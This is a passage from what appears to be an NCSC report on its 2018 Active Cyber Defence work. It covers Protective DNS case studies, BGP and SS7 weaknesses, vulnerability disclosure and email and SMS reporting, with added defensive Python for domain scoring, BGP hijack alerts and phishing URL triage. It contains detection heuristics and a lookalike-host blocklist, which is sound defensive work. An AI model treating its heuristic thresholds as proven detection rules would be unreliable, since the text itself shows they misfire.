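    name = fqdn.lower().rstrip(".")
    return any(name == a or name.endswith("." + a) for a in allowlist)


def decide(fqdn: str, allowlist=ALLOWLIST, threshold=THRESHOLD) -> str:
    """The allowlist is checked first: a heuristic can never block an allowlisted name."""
    if is_allowlisted(fqdn, allowlist):
        return "allow"
    return "block" if dga_score(fqdn) >= threshold else "allow"


if __name__ == "__main__":
    for name in ("xk3v9qw2pzt7.example", "mail.example",
                 "www.northwestcouncil.example", "www.update.microsoft.com"):
        print(f"{name:32} score={dga_score(name):2d} -> {decide(name)}")
```

The constructed name www.northwestcouncil.example is an ordinary looking name that still scores 9 (entropy above 3 bits, the consonant run ‘rthw’, and its length), the same as the DGA-like xk3v9qw2pzt7.example. That is exactly the undetected false positive the whitelisting iterations exist to catch, and why a lexical heuristic should contribute to a score that is reviewed rather than block on its own.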

6.5 Customer case studies

6.5.1 Remediating a worm at a local authority

In some cases, PDNS can help customers discover unprotected parts of their infrastructure. In June, a local authority network was flagged as behaving as though infected with Ramnit, a worm which affects Windows systems. The local authority was duly notified and they investigated with the network owner. The network in question was a primary school which the local authority had overall responsibility for, but the IT support was provided by a third party. The antivirus that was installed on the school’s endpoints was not working, unbeknown to the local authority or the school. As a result the estate had a wide level of infection. Not only did PDNS block the malicious connections, containing any harm, it also identified the malware and notified the local authority.

The fix was uncomplicated. The local authority installed a working antivirus and it cleaned up the infection; PDNS logs show that the clean-up appeared to complete within a day. From our logs, we can see the remediation in action, as shown in figure 31.

Figure 31: Remediation of a Ramnit infection (daily number of blocks, 31 May to 24 June 2018; y-axis 0 to 400,000)

It is worth noting that this was a significant infection, as this estate had immediately previously been responsible for an estimated two thirds of all the blocks on the PDNS service.

6.5.2 USB infection

PDNS looks for indicators of compromise, but is neutral about the method of compromise. It finds indicators of malware that has been installed by a phishing attack or has been introduced through an infected USB mass storage device, or any other delivery vector.

One public sector organisation was getting a very large and weirdly consistent number of connections to dodgy websites. PDNS notified the organisation and they investigated their infrastructure. They traced the malware to initial infection through a malicious USB stick being plugged into the network. In this case, the removal of the malware was more complicated and they enlisted the help of some external partners to clean up their network.

Figure 32 shows the number of blocked connections before and after the malware removal. The number of daily blocks before the removal is very consistent - it only varies by 5, with the highest number of daily blocks being 2,857. This level of consistency indicates an automated process, almost certainly a ‘first stage’ infection that could not progress to a more harmful second stage because of the effect of the PDNS service.

Figure 32: Traffic from a USB-installed malware infection (daily number of blocks, 21 April to 9 May 2018; y-axis 0 to 3,000)

After the malware was removed, the number of blocks for this particular organisation went from 2,852 on the 30th of April to 1 on the 2nd of May.

In this instance, PDNS was able to provide vital information to help the information security team locate and remove the malware, while managing the potential harm until remediation was achieved.


6.5.3 Multiple internet connections

In the previous two case studies, the PDNS service helped to identify malicious software that had somehow bypassed the organisation’s existing security solutions and helped mitigate the potential harm. Regardless of their network build, security competence or business, all modern organisations suffer from a common problem, the pesky ‘need to be connected to the Internet’ problem. Organisations of any reasonable scale will end up with multiple internet connections. The problem is that they may not know about all of them at a corporate security level.

In August 2018, the PDNS service began seeing many malicious connections from a large public sector organisation which deals with sensitive information. The service blocked the connections and notified the organisation, who then investigated. Figure 33 shows the blocks involved in this incident.

Figure 33: Number of blocks relating to unauthorised software (daily number of blocks, 28 July to 3 August 2018; y-axis 0 to 2,500)

The investigation uncovered a previously unknown connection to the internet which employees were using to download unauthorised software, among other things. Attackers had made use of the unprotected internet connection to get an initial presence in the network and then pivoted further in, landing on devices which were protected by the PDNS service, leading to detection.

As is obvious from figure 33, once the organisation knew about the malware, they were able to fully remove it from their network. They were also able to put protection around the previously unknown internet connection and onboard it onto the PDNS service. That’s one less way into that organisation.


6.6 IPv6

IPv6, the next generation of internet protocol, is still not widely used. In November and December, we saw very small amounts of IPv6 queries when compared to IPv4 requests:

Date (2018)    IPv4 requests     IPv6 requests
01 Nov         2,000,066,900        60,472
06 Nov         2,046,132,415        60,427
13 Nov         2,154,085,587        60,485
21 Nov         2,217,939,756        60,446
27 Nov         2,249,342,991        60,463
05 Dec         2,262,208,216        60,472
12 Dec         2,292,671,634        60,450
19 Dec         2,291,329,751        60,477
24 Dec         2,138,858,623        60,465

Table 21: Comparison of volume of IPv4 and IPv6 requests

It’s interesting to note that the volume of IPv6 queries is very consistent, suggesting that they are being generated by some kind of automated process rather than being down to normal user browsing. This suggests that networks haven’t actually transitioned to IPv6 in any real sense of the word, and these are likely to be default configurations of particular services.

Recent history would suggest that IPv6 adoption at scale isn’t going to happen any time soon, but we are following the data on IPv6 to make sure our guidance and advice is consistent with how protocols are being used.

6.7 Automated sharing

The PDNS service now shares ‘fact of’ block events with an external MISP instance. More detail is provided in section 11. We are also trialling an automated declassification and action system that allows NCSC analysts to declassify and release classified indicators of compromise to protect the UK, starting with the public sector PDNS service. At the end of September 2018, the trial of the automated sharing system was started. Analysts within NCSC can, with the press of a button, send indicators to the PDNS service, with automated legal and policy checks being applied as the indicator is declassified. This process takes only seconds. The end result is that NCSC analysis can directly protect the public sector through the PDNS service in a low friction way. Work is underway to expand the external partners that can benefit from this data. To give an example of scale, in one week NCSC analysts declassified and released four domains to the PDNS service, which blocked access to them 21 times.

6.8 Unintended benefits

Our researchers have begun exploring additional ways to use the data created as part of the normal operation of the PDNS service to help our users. One strand of work showing some promise is about trying to help users better understand the technologies in use on their networks, using only DNS resolution data. Most modern software calls out to pre-defined domains for various housekeeping and telemetry reasons, for example to check for software updates or licence status. Some modern services require configuration through ‘discovery’ domains whereby subdomains of a specific form are created, for example to expose an identity federation point. These all end up being queried through the PDNS service and we can do some data science on the resulting queries and responses to try to infer the use in end networks of particular technologies.

Our first experiment is an adaptation of some academic research to determine the presence of specific operating systems in customer networks. Windows XP typically looks for updates once a day by connecting to www.update.microsoft.com, the DNS record for which has a TTL of 60 minutes, making it likely that we’ll see a number of requests on the PDNS service. No other version of Windows or any other software routinely connects to this domain. We look for periodic requests to this domain from customer networks (a one-off connection could be a visitor or other anomaly) and record the customer networks where the DNS traffic looks like there’s at least one Windows XP machine on the network[21]. From this experiment, we’re pretty confident that at least 168 unique organisations routinely use Windows XP. Many customers have unique registrations on the service for particular networks, and so we can say with some confidence that at least 318 unique networks have evidence of routine use of Windows XP. There’s a tendency for these numbers to be on the low side, both because we’re being relatively conservative in this early experiment and because some customers represent shared services organisations, for example a regional connectivity partnership that would hide the individual networks behind it.
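As an added illustration of the analytic just described (not the NCSC’s implementation, which the report says has more to it), the following code looks for customer source addresses that query www.update.microsoft.com on a run of consecutive days rather than once, which is the ‘periodic, not one-off’ distinction the paragraph draws. The log format, the thresholds, the source addresses (RFC 5737 documentation ranges) and the log lines themselves are all constructed assumptions.

```python
"""Approximation of the Windows XP analytic described above: flag customer
source addresses that query www.update.microsoft.com on a run of consecutive
days rather than once.

Added example, not the NCSC's analytic (the report says there is more to it).
The log format, thresholds, source addresses (RFC 5737 ranges) and log lines
are all constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

XP_DOMAIN = "www.update.microsoft.com"
MIN_DAYS = 5       # assumed: at least this many distinct days with a query
MAX_GAP_DAYS = 2   # assumed: consecutive query days no further apart than this


def parse_log(lines):
    """Yield (timestamp, source, qname) from constructed 'ISO8601 source qname' lines."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, qname = line.split()
        yield datetime.fromisoformat(ts), src, qname.lower().rstrip(".")


def xp_candidates(lines, domain=XP_DOMAIN, min_days=MIN_DAYS, max_gap_days=MAX_GAP_DAYS):
    """Sorted list of sources whose queries for `domain` look periodic (daily-ish)."""
    days_by_src = defaultdict(set)
    for ts, src, qname in parse_log(lines):
        if qname == domain:
            days_by_src[src].add(ts.date())
    hits = []
    for src, days in days_by_src.items():
        ordered = sorted(days)
        if len(ordered) < min_days:
            continue  # a one-off (a visitor's laptop, say) is not routine use
        gaps = [(b - a).days for a, b in zip(ordered, ordered[1:])]
        if max(gaps) <= max_gap_days:
            hits.append(src)
    return sorted(hits)


def constructed_log():
    """Constructed sample. 203.0.113.10 queries daily for a week (XP-like);
    198.51.100.20 once; 192.0.2.30 on three days; 203.0.113.40 daily but with
    a three-day gap. One unrelated query is included as noise."""
    base = datetime(2018, 11, 1, 9, 0)

    def day(d):
        return (base + timedelta(days=d)).isoformat()

    lines = [f"{day(d)} 203.0.113.10 {XP_DOMAIN}" for d in range(7)]
    lines.append(f"{day(0)} 198.51.100.20 {XP_DOMAIN}")
    lines += [f"{day(d)} 192.0.2.30 {XP_DOMAIN}" for d in (0, 1, 2)]
    lines += [f"{day(d)} 203.0.113.40 {XP_DOMAIN}" for d in (0, 1, 2, 3, 6, 7)]
    lines.append(f"{day(0)} 203.0.113.10 www.example.com")
    return lines


if __name__ == "__main__":
    print(xp_candidates(constructed_log()))  # ['203.0.113.10']
```

With the assumed thresholds only the source that queried daily for a week is reported; the single query, the three-day run and the source with a three-day hole are all left out, which is the conservative bias the paragraph mentions. Loosening max_gap_days to 3 admits the source with the hole, so the thresholds are the knob that trades missed networks against visitors’ laptops being counted.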

Next steps in this work include trying to build analytics that give an estimate for the number of machines running each piece of software we look for, and to expand the types of software and services this analytic tries to detect. The intent is to give network administrators better information to help them manage their security risks and to help NCSC work out where we should invest our research effort; if lots of customers start using a new piece of software or service, we should look into the security of it. Finally, we hope to be able to provide automated vulnerability notification. If a CVE is registered against a particular product (or the vendor releases a patch), we should be able to determine which organisations are running the product and inform them in a very timely manner. This is cool.

There will be ongoing research into the value that the DNS resolution data on the PDNS service can bring to customers and the NCSC, on top of the direct cyber security benefit of blocking access to malicious domains.

6.9 Conclusion

The PDNS service has proven its value already, providing a real protective effect at scale to the subscribed customers. In the next year of service, we are intending to retender the service and look to onboard more public sector customers. Tuning and categorising the feeds will be important as we share more detections, to ensure that any overblocking is minimised. New features that provide better service, better actionable intelligence for our customers and more cyber security benefit (over and above blocking malicious domains) will also be coming online in 2019. DNS is cool.

[21] There’s a bit more to it than as described here, but this gives the general idea.

7 Routing and signalling

7.1 BGP

Border Gateway Protocol (BGP) is the protocol which determines how internet traffic should be routed. The internet is made up of many smaller networks called ‘Autonomous Systems’ (AS) which are run and managed by various companies across the world. Today, there are nearly 90,000 AS worldwide. BGP was developed at a time when there were many fewer AS and so there was more trust in networks and the route cost data they advertised. Each AS advertises the cost of getting to further destinations using its network via BGP, which allows for resilient routing across the various systems.

The problem is that BGP is a truly terrible protocol with no authentication or integrity on the BGP path updates, so it’s easy for any participant in the protocol to lie and pretty much arbitrarily reroute large swathes of internet traffic. There have been a few examples of this in the public domain, for example when a good proportion of Google’s IP space was hijacked to route via China and a similar event involving AWS traffic. There are cryptographic extensions to BGP which try to solve part of this problem (RPKI-based route origin validation and BGPsec). Unfortunately, the cost of implementation is disproportionately high and the current protocol extensions don’t actually fix the majority of the problems we see. The problems we now face with BGP are a good lesson about getting trust models right in distributed, global systems.

7.2 Source address spoofing

Last year, we talked about the intent to reduce the capability of UK IP space to participate in attacks that need source address spoofing and the changes needed to enforce that. We also talked about the preferred measurement method for this - getting ISPs to use the Spoofer project from the Center for Applied Internet Data Analysis (CAIDA). Last year, we reported that Spoofer tested around 1,700 /24 IPv4 blocks, or about 0.74% of the reachable IP space delegated to the UK. Unfortunately, this year, Spoofer seems to have only tested 1,531 /24 IPv4 blocks, which remains statistically insignificant. We will seek to find other ways to increase the fidelity of measurement.

7.3 BGP monitoring

Today, there is no foolproof way of detecting BGP path update anomalies as part of normal operation of the protocol. The next best thing would be to detect weird[22] BGP updates and either notify the affected ISP or, better still, automatically unwind the update to stop traffic hijacks. We have developed a proof of concept BGP Monitoring Platform, working with BT. It establishes BGP peerings with multiple AS in order to collect different views of the internet routing table. A BGP peering is where two routers create a BGP connection in order to exchange routing information. Peerings included BT’s UK network (AS2856), BT’s European (AS5400) and rest-of-world (AS3300) networks. As the data was ingested, a set of analytics was run to try to detect any weird path updates or IP prefix advertisements. Any weirdness generated an alert which was pushed to a dashboard, to allow analysts to investigate. With anything BGP related, diversity of data is key in order to get multiple ‘views’ of the traffic routing and cost model. So, we want to ingest as many BGP announcement sources as possible. For the experimental platform, the bulk of the BGP announcement data is being collected from the RouteViews repositories, with some reference sources used for IP and geolocation. BT is providing BT’s BGP announcement data for AS2856, AS5400 and AS3300. Using these data and the basic analytics we have trialled, we have shown that the platform can already automatically detect certain classes of BGP hijacks, correctly analyse the problem and report the event to an analyst for investigation.

[22] ‘Weird’ is probably the best description of a potentially malicious BGP update. Updates are very context specific and are affected by real world events like networks going down or unintended digger/fibre bundle interfaces. The same update could be deemed fine in one context and weird in another.

In 2019, we will be further developing the platform by rebuilding the experimental platform in a commercial cloud hosting environment to allow better scaling and connectivity, onboarding more UK ISPs onto the platform to get higher fidelity BGP announcement data for the prefixes we care about, and building up the library of analytics that run on the streaming BGP updates.

Our intent is that during 2019, we will have both simple change detection (based on changes in ASN paths and ASN owners) and some more complex analytics. These are likely to include:

• Geo analysis of updates: is the geolocation of the network range unusual when compared to the geolocation breakdown of the new ASN on the path?

• Changes to ‘important’ IP ranges: are important services, like DNS servers, being hijacked from the point of view of a customer?

• Matching BGP ownership with registrar information on the same network ranges: differences should be interesting.

• Building a ‘baseline’ of an ASN view: if we can build a model for what ‘normal’[23] looks like for a particular ASN, weird changes should be easy to highlight.
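As an added example of the ‘baseline’ analytic in the last bullet (illustrative code, not the NCSC/BT platform’s), the following learns which origin ASNs normally announce each prefix during a baseline period, then flags streamed announcements whose origin differs, or which announce a more-specific of a baselined prefix from an origin not seen for the covering prefix. The ASNs are from the documentation range reserved by RFC 5398, the prefixes from RFC 5737, and every update record is constructed.

```python
"""Illustration of the 'baseline' analytic: learn which origin ASNs normally
announce each prefix, then flag streamed announcements whose origin changes or
that announce a more-specific of a baselined prefix from an unexpected origin.

Added example, not the NCSC/BT platform's analytics. ASNs are from the
documentation range reserved by RFC 5398, prefixes from RFC 5737, and every
update record below is constructed.
"""
import ipaddress
from collections import defaultdict


class OriginBaseline:
    def __init__(self):
        # prefix -> set of origin ASNs seen announcing it during the baseline period
        self.origins = defaultdict(set)

    def learn(self, prefix, as_path):
        # The origin is the last ASN in the path; prepending just repeats it.
        self.origins[ipaddress.ip_network(prefix)].add(as_path[-1])

    def covering(self, net):
        """Baselined prefixes that contain net (net itself excluded), most specific first."""
        return sorted((p for p in self.origins if p != net and p.supernet_of(net)),
                      key=lambda p: p.prefixlen, reverse=True)

    def check(self, prefix, as_path):
        """Alerts for one announcement; an empty list means it matches the baseline."""
        net = ipaddress.ip_network(prefix)
        origin = as_path[-1]
        alerts = []
        if net in self.origins:
            if origin not in self.origins[net]:
                alerts.append(f"origin change: {net} now from AS{origin}, "
                              f"baseline {sorted(self.origins[net])}")
        else:
            for parent in self.covering(net):
                if origin not in self.origins[parent]:
                    alerts.append(f"more-specific from unexpected origin: {net} from AS{origin}, "
                                  f"covering {parent} baselined to {sorted(self.origins[parent])}")
                break  # judge against the most specific covering prefix only
        return alerts


# Constructed baseline period: (prefix, AS path), origin last.
BASELINE_UPDATES = [
    ("192.0.2.0/24", [64496, 64500]),
    ("198.51.100.0/24", [64496, 64501]),
    ("203.0.113.0/24", [64496, 64502]),
    ("203.0.113.0/24", [64497, 64502]),  # same origin via another path
]

# Constructed live stream to test against the baseline.
STREAM = [
    ("192.0.2.0/24", [64496, 64500]),            # normal
    ("192.0.2.0/24", [64498, 64505]),            # origin changed: alert
    ("198.51.100.0/25", [64499, 64506]),         # more-specific from a stranger: alert
    ("198.51.100.128/25", [64496, 64501]),       # more-specific from the real origin: fine
    ("203.0.113.0/24", [64497, 64502, 64502]),   # prepended but same origin: fine
]


def run_constructed():
    """Build the baseline, replay the stream, return [(prefix, alert), ...]."""
    baseline = OriginBaseline()
    for prefix, path in BASELINE_UPDATES:
        baseline.learn(prefix, path)
    return [(prefix, a) for prefix, path in STREAM for a in baseline.check(prefix, path)]


if __name__ == "__main__":
    for prefix, alert in run_constructed():
        print(alert)
```

A more-specific announced by one of the covering prefix’s own baseline origins is left alone, since that is ordinary traffic engineering, and path prepending does not disturb the check because the origin is always the last ASN in the path. What this cannot see is a hijacker that forges the legitimate origin at the end of a bogus path; that needs the path-level analytics above (geolocation of the new ASN, registry ownership) rather than an origin baseline.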

We also intend to build a set of analyst tools to help visualise and investigate complex BGP data. To start with, we’ll be working with IPv4 updates. We’ll look at IPv6 BGP updates at some point in the future.

7.4 SS7

Signalling System No 7 (SS7) is the protocol by which international telecoms networks talk to each other in order to route calls, send SMS and allow users to roam between countries. It was originally created in 1975 and has undergone little fundamental change since then. SS7 has no real security built in and, given how the telecoms sector has evolved, it can now be trivial to exploit SS7 weaknesses, depending on the network. Exploiting those weaknesses can allow an attacker to geolocate a user’s phone, reroute SMS messages and voice calls so that they can be intercepted, get networks to release encryption keys, and other nefarious actions. It is impractical to expect a change in the standard for SS7, but we believe we can better protect users of UK networks from these sorts of attacks while simultaneously ensuring that the next generation telecoms signalling protocol (Diameter) is better secured.

Last year, we talked about doing some independent testing of the UK SS7 signalling terminations to see if they have correctly implemented the GSMA’s basic guidance for filtering SS7 messages (GSMA document FS.21) and whether those filters had the desired effect. We’ve completed that testing and the results aren’t fantastic, with all the tested networks falling short in some way and some of them quite seriously. We’re now working with those networks to try to fix some of these issues. Since SS7 is the way that UK telephony connects to the rest of the world, including some adversaries, this needs to be done very carefully to make sure we don’t accidentally turn the UK into a communications island!

One of the other discoveries from the SS7 work is that a small number of UK registered Global Titles[24] seem to be responsible for a disproportionate volume of malicious SS7 traffic. We aren’t 100% sure of why this is yet and will be working with the owners of those Global Titles to better understand what’s going on and how we could fix it.

[23] As ‘normal’ as BGP can get!
[24] Global Titles are effectively the international dialling prefix for a network and are used to uniquely identify that network in the global signalling system.

7.5 SMS

Last year, we talked about extending an experiment done with HMRC to better control the use of certain SMS alphanumeric ‘from addresses’[25] to help with smishing, or phishing over SMS. We now have a project running with industry, led by the Mobile Ecosystem Forum, called ‘SMS SenderID Protection Registry’, announced here[26]. The idea is to build a register of protected TPOAs which aggregators and mobile operators will use to better manage SMS abuse. This is still in its early stages but does look very promising. We are seeing some interesting edge cases already, much like people did as we started the journey to secure email. These all seem to be manageable in the long term though. The trick will be making it self-sustaining once we stop funding the programme.

Smishing attacks work in a very similar way to phishing attacks. They attempt to confuse the recipient into having trust in the message and then clicking an embedded link which takes them to a site which normally attempts to harvest credentials and the like. Malware install over smishing attacks is rare today. One of the things we have been investigating is whether we could automate takedowns of phishing sites that drive traffic over SMS in the same way we do over email. We have been working with the Information Commissioner’s Office and the mobile industry in the UK to get access to a centralised reporting point for weird SMS. We have a proof of concept that takes reported SMSs, extracts any URLs embedded and puts them into our standard takedown pipeline. This could be productionised in 2019, subject to agreement with the Information Commissioner’s Office and the network operators.

[25] Strictly, the Transport Path Originating Address (TPOA).
[26] https://mobileecosystemforum.com/2018/11/27/sms-senderid-protection-registry-announced/

8 Host-based capability

Host-Based Capability (HBC) is a new part of the ACD portfolio. It is a software agent which is deployed on public sector endpoints and which collects and analyses technical metadata to help public sector system owners understand the security of those systems. The data are used to detect malicious activity, provide monthly threat surface reporting, and assess exposure to serious cyber threats (e.g. WannaCry). Obviously, the agent must be installed by the owner of the system, but they all communicate back to a central function at NCSC for analysis.

The agent and the analysis platform are actually provided by one of our close partners and we are limited by their policy in what we can say. We’re working with them to get to a point that we can provide much more detail, but this year we’re very limited in what we can publish.

At the conclusion of the project’s pilot year, the service has been deployed to 26,000 government devices across 5 departments. Seven incidents have been identified using this service, and 15 ‘Threat Surface Reports’ have been delivered to network owners. These Threat Surface Reports provide actionable cyber security metrics to departments. Examples include:

• operating system versions, common software versions and time taken to patch

• administrative account allocation and risky administrator processes

• USB device logging

• network shares

In 2019, the host-based capability team are going to build capacity and expand within the public sector to onboard more customers and more devices.

9 Vulnerability Disclosure Platform

One of the things we’ve observed as we’ve become more public is that responsible security researchers approach us to report vulnerabilities in UK government services and sites. Obviously, we’re very grateful to those researchers for dealing with these vulnerabilities responsibly, but when talking to them about their experiences of working with UK government in this way, it became clear it wasn’t always a pleasant experience for the researchers. There wasn’t a single, simple way to talk to departments about potential vulnerabilities. Some departments didn’t respond appropriately when they were contacted and we even had reports of a couple of really daft things like threatening security researchers with legal action for trying to disclose[27].

We decided to build a vulnerability disclosure and management platform for all of HMG and to make it as researcher friendly as possible, while still protecting the security of the services involved. We first ran a pilot to really understand all the moving parts involved and to understand where we would need to invest effort to fix things. This ran for a few months before we sought to build the full operational platform.

This is pretty much a solved problem so we looked to work with industry to do this quickly and in a proven way. After a competition, we selected HackerOne as the disclosure management platform and NCC Group to help us triage reports as they came in. The hardest thing in building an enterprise-wide[28] vulnerability management platform is engendering the right processes and behaviours in those departments that will receive the reports and have to act on them. The vast majority of HMG departments have worked really well with us on this and we can see the interaction with security researchers is much better, with a concomitant better outcome for all concerned. There remains work to do in this area, though.

Where departments have a functioning and well-managed vulnerability disclosure process, researchers can continue to disclose directly. However, if they can’t find a good point of contact or don’t get an appropriate response from the department, they can report via our vulnerability reporting system. The vulnerability will be triaged and passed to the right point of contact in the relevant department for remediation. Disclosers and system owners can both track progress on the site. We don’t offer bug bounties for HMG, but we hope that by making the process as frictionless as possible, we can encourage security researchers to disclose vulnerabilities in HMG systems responsibly. We do have NCSC challenge coins for particularly awesome bugs, but there’s a very, very high bar for those!

The service went live properly on 15th November 2018. In the last two weeks of November, we had 11 submissions and 10 were resolved. In December, we had 27 submissions and 19 were resolved. Of the 38 valid reports received, 56% of the vulnerabilities involved reflected cross-site scripting (XSS). XSS vulnerabilities are relatively easy to find and so this small sample of data doesn’t necessarily tell us much about a systemic issue with XSS vulnerabilities in HMG systems. A full year of vulnerability data will be interesting, though. More on this next year.

Obviously, our platform only helps HMG system owners. We need other organisations to have predictable, easy vulnerability processes so they are able to manage vulnerability reports well and reduce any potential harm. We’ve started to document our journey building the HMG Vulnerability Disclosure Platform in some NCSC blogs[29]. We’ll continue to do that in the hope that it will help other organisations build their own processes without necessarily making the mistakes we had to.

[27] It’s difficult to express quite how daft we think this sort of behaviour is.

[28] For the purposes of this work, HMG is just a really big enterprise.

[29] https://www.ncsc.gov.uk/blog-post/ncsc-vulnerability-disclosure-co-ordination and links from there

10 Suspicious Email Incubator

The volume of fraudulent and malicious emails received by the public is increasing. Reporting malicious and fraudulent events to law enforcement is important as it allows for mitigation and law enforcement action, can help provide support to victims and helps us collectively better understand the threat. City of London Police run the national Action Fraud system where victims can report cyber crime. The platform today doesn’t provide the kind of tactical and strategic threat information that we collectively need to prioritise our interventions across the protective cyber community[30]. To help tackle this, in 2018 we ran an incubator (that is, an early stage proof of concept) in partnership with Action Fraud to develop and build a prototype system to test the automated takedown of malicious content identified from public reports.

To start with, we looked at user needs for each of the actors in the system - a member of the public, an ‘organisation’[31] and HMG/law enforcement. This led to the basic design intents for the system:

• simple for the public to use

• invoking the system would be an intuitive action given their likely context[32]

• provides feedback to the victim automatically

• takes protective action automatically

• provides useful intelligence and data to the NCSC and law enforcement

We also commissioned some large scale user research, performing a mass online survey that had 2339 individual responses and ten one-to-one phone interviews with a representative sample of the UK public who are big email users. This research gave us some useful data to help us understand what we need to build in the future, but the incubator proof of concept focused on automatically processing a sample of public reports. That automated processing pipeline produces an opinion on the email, which is returned to the user. Any URLs in the mail that are deemed malicious are automatically put into the takedown system, which also adds them to a number of the commercial safe browsing lists, protecting users of many modern browsers even if the site isn’t taken down.

The incubator ran from 1st to 31st March 2018. During that period, there were 918 submissions in total and of those 154 were malicious, roughly 17%. There were 52 individual reporters of suspicious emails, and the number of emails submitted and the quality of those submissions varied widely. Action Fraud, which was treated as a single reporter for the purposes of this initial experiment, forwarded 611 emails to the service, of which 74 - 12% - were malicious. Embedded in all those Action Fraud emails were 3594 unique URLs, of which 89 were malicious. Of those 89 malicious URLs, 43 were new to us. During March, those 89 malicious URLs would have been automatically taken down, using our existing Takedown Service, if the system had been live. From this small sample, it looks like the Great British public is a great source of information for helping prevent cyber crime which we are currently underutilising.
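The two pipelines described above, the smishing proof of concept in the previous section and the incubator's email processing here, share the same core: pull URLs out of a reported message, de-duplicate them, decide which are malicious, and work out which are new. The following is an added example of that core and is not the NCSC or Action Fraud code. It assumes a report is either a raw SMS body or an RFC 5322 email as text, and it stands in for the pipeline's real analysis with a constructed blocklist and brand list; every host, address and message below is constructed sample data, not a real indicator. The `summarise` function reproduces the shape of the figures quoted for March 2018 (submissions, malicious submissions, unique URLs, malicious URLs, URLs new to the takedown system).

```python
"""Triage of URLs found in publicly reported suspicious SMS and email messages.

Added example, not the NCSC or Action Fraud pipeline. A report is either a raw
SMS body or an RFC 5322 email as text. The blocklist and brand list are
constructed stand-ins for the pipeline's real analysis.
"""
import re
from email import message_from_string
from urllib.parse import urlsplit

# Constructed sample threat data (hypothetical hosts, not real indicators).
PROTECTED_BRANDS = {"examplebank": "examplebank.example"}  # keyword -> genuine host
BLOCKLIST_HOSTS = {"bad.example.net"}                       # known malicious hosts
ALREADY_IN_TAKEDOWN = {"bad.example.net"}                   # hosts already being actioned

# Loose matcher: SMS lures often omit the scheme, so it is optional. The lookbehind
# stops e-mail addresses ("user@host.example") being read as URLs.
URL_RE = re.compile(
    r"(?<![@\w.-])(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?::\d{2,5})?"
    r"(?:/[^\s<>\"')]*)?",
    re.IGNORECASE,
)


def normalise(raw):
    """Canonical form so the same link in different reports counts once."""
    raw = raw.rstrip(".,;:!?")
    if not raw.lower().startswith(("http://", "https://")):
        raw = "http://" + raw
    p = urlsplit(raw)
    try:
        port = p.port
    except ValueError:  # out-of-range port: keep the URL but drop the port
        port = None
    url = f"{p.scheme.lower()}://{(p.hostname or '').lower()}"
    if port:
        url += f":{port}"
    url += p.path or "/"
    if p.query:
        url += "?" + p.query
    return url  # fragments are dropped: they never reach the server


def extract_urls(text):
    """Ordered, de-duplicated URLs in a message body."""
    found = []
    for m in URL_RE.finditer(text):
        url = normalise(m.group(0))
        if url not in found:
            found.append(url)
    return found


def email_body_text(raw_email):
    """Concatenate all text/plain and text/html parts of an e-mail."""
    msg = message_from_string(raw_email)
    chunks = []
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def verdict(url):
    """Constructed stand-in for the pipeline's analysis: a blocklisted host, or a
    host that borrows a protected brand's name without being that brand's domain."""
    host = urlsplit(url).hostname or ""
    if host in BLOCKLIST_HOSTS:
        return "malicious"
    for keyword, genuine in PROTECTED_BRANDS.items():
        if keyword in host and host != genuine and not host.endswith("." + genuine):
            return "malicious"
    return "benign"


def triage(report, kind="sms"):
    """Per-report result: all URLs, those judged malicious, and those whose host is
    not yet in the takedown system ('new to us' in the incubator figures)."""
    text = report if kind == "sms" else email_body_text(report)
    urls = extract_urls(text)
    malicious = [u for u in urls if verdict(u) == "malicious"]
    new = [u for u in malicious if urlsplit(u).hostname not in ALREADY_IN_TAKEDOWN]
    return {"urls": urls, "malicious": malicious, "new_to_takedown": new}


def summarise(reports):
    """Aggregate over (text, kind) pairs the way the incubator numbers are presented."""
    totals = {"submissions": 0, "malicious_submissions": 0}
    unique, malicious, new = set(), set(), set()
    for text, kind in reports:
        r = triage(text, kind)
        totals["submissions"] += 1
        totals["malicious_submissions"] += int(bool(r["malicious"]))
        unique.update(r["urls"])
        malicious.update(r["malicious"])
        new.update(r["new_to_takedown"])
    totals.update(unique_urls=len(unique), malicious_urls=len(malicious), new_urls=len(new))
    return totals


# Constructed sample reports.
SAMPLE_SMS_LURE = "ExampleBank: your account is locked, verify now at examplebank-secure.example/login"
SAMPLE_SMS_OK = "Your statement is ready: https://examplebank.example/statements"
SAMPLE_EMAIL = """From: alerts@examplebank-secure.example
To: someone@example.org
Subject: Action required
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please confirm at http://bad.example.net/confirm

--b1
Content-Type: text/html; charset=utf-8

<p>Please <a href="http://bad.example.net/confirm?id=1">confirm</a></p>
--b1--
"""
SAMPLE_REPORTS = [(SAMPLE_SMS_LURE, "sms"), (SAMPLE_SMS_OK, "sms"), (SAMPLE_EMAIL, "email")]

if __name__ == "__main__":
    print(summarise(SAMPLE_REPORTS))
```

The per-host comparison against the takedown set mirrors how "new to us" is counted above: two different paths on an already-actioned host are not new work, whereas a single URL on a fresh lookalike host is. A production version would replace `verdict` with real analysis and would also want to record which reporter each URL came from, since reporter quality varied widely.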

The incubator convinced us this would be a useful service to build in anger. So, since late 2018, we have been working with Action Fraud to design and build this new automated reporting system. We are aiming to launch it to the public later in 2019. It will be really important to communicate to the public that they can make a difference to enhancing the security of the internet by reporting the suspicious emails they receive. The more reports received, the greater the number of malicious URLs removed from the internet and, more importantly, the better data we have about the criminals perpetrating this activity. That data will inform NCSC as to what new services could be useful to better protect the UK and should provide law enforcement with data that will help them understand the strategic threat to the UK and so target protective messages to the public.

[30] This includes, for example, law enforcement’s Cyber PROTECT Network, who scale protective advice out to their local communities, and through enforcement bring criminals to justice and reduce national harm.

[31] This is intended to cover large and small enterprises, but ends up being more relevant to small and medium enterprises.

[32] That context being reading an email that they feel is a bit dodgy.

Looking to the future, the service is planned to be extended to take reports of suspicious text messages.

11 Scaling

The intent of the Active Cyber Defence programme has always been to test things on the public sector first and then expand their usage to the wider UK and, eventually, internationally in order to get maximum protective benefit. There are some ACD services and functions that NCSC can scale to the wider UK, for example the Takedown Service. There are some that could be delivered to specific sectors by proxies for the NCSC and there are some that individual organisations need to implement themselves. For each service, the scaling outside of the public sector has very specific characteristics and constraints. Sometimes these are constraints around ensuring privacy, sometimes about adversely affecting a market and sometimes just because there are better ways of achieving something than government delivering it.

